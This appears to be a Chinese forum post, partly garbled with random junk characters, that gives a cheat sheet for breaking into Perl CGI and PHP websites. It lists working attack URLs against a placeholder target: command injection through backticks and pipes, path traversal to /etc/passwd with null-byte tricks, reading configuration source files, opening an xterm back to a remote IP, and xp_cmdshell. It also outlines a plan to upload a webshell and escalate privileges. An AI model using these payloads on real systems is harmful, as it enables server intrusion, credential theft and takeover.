总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 n1 O; |& Z' X* d2 c+ m! @
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
1 a8 ?3 U5 d, a! {/ Y感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们
$ M& l% l K4 A5 N! s9 V# S& R8 R注“
- K2 n4 ?$ n. C, S6 Q8 a. nperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。
" }" W% X0 E2 e; t7 W8 O6 \: M以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET ( y7 g5 R2 k% b
( a0 X" U, g# E6 _
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造 5 O$ z2 H* D5 b! N( v
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
% i" ~& }0 k3 O; M' z. f- Qhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
# l: U: ^" ^; o; e& P! ehttp://target.com/cgi-bin/home/news/sub.pl?`id` 2 T" K* @) K0 t7 q0 T& m/ S
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` ; W @, c! ]0 m" u% I" a& U
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示 $ h6 ]+ D' R, |- a; G) @) k. |. F
) B- w1 p& C1 V5 phttp://target.com/test.pl;ls| ; f; Z( v2 U$ h C( X. v
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
2 t6 Z; v. M. v& ? |% mhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26| 2 g! E& g E% ~% p. Y) _
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 5 }, x% v; T! U* e2 @- L4 i8 a" {
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。
; t" i" x- `. nhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection
$ |! g U& A# U, \1 V" Q* X6 r' b) [6 Q# Y$ F% n' p
http://target.com/test.pl?&........ /../../etc/passwd $ w+ E8 L c7 P& b* R6 ~0 S* ]
; h7 h2 E+ F, u4 I1 Hhttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./
2 F8 K+ Q, Q+ f7 |. N+ a8 Khttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了
" i& E, i8 C2 V ihttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 3 O% h1 @% W- k! B0 s$ _4 \6 u
4 d, q6 |7 e' Y6 p9 }http://www.target.org/show.php?f ... /include/config.php 查看php代码
. M" V! ~2 i; T4 ~+ t- Qhttp://www.target.org/show.php?f ... ng/admin/global.php / C( l+ G' g; @* r( ^' E! m
7 l' e9 u9 {: l" s/ y
emm和ps的一句话9 X. w6 G, j; G' Y' R' u
8 T5 j# o! \& W) U5 t/ J
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20 6 |0 r$ b0 j& i. Q) g
% t5 I2 J) _! V( n) }' J>bbb%20| % l! ^+ ~# r% u
* X- U& H1 j% S, c4 n7 t) u% S
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串
: s( o7 I$ k0 {% \+ L7 E+ T
: {* [) j: J ?1 [. R- ehttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征
9 @1 @3 Y$ C- D9 d! J1 Chttp://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin
4 N" ~. ?! b6 c. [& h1 f/ {$ j6 x x5 q! R6 w
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 ) ^4 y" |# G+ m5 i- |; ]. f
http://target.com/index.html#cmd.exe
6 O3 X- @# B9 Y/ c+ D: ehttp://target.com/index.html?dummyparam=xp_cmdshell , G6 L$ Y2 c3 ]5 s3 H
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd $ d/ L( r: Q+ }# ?( u' E% R" {* M
|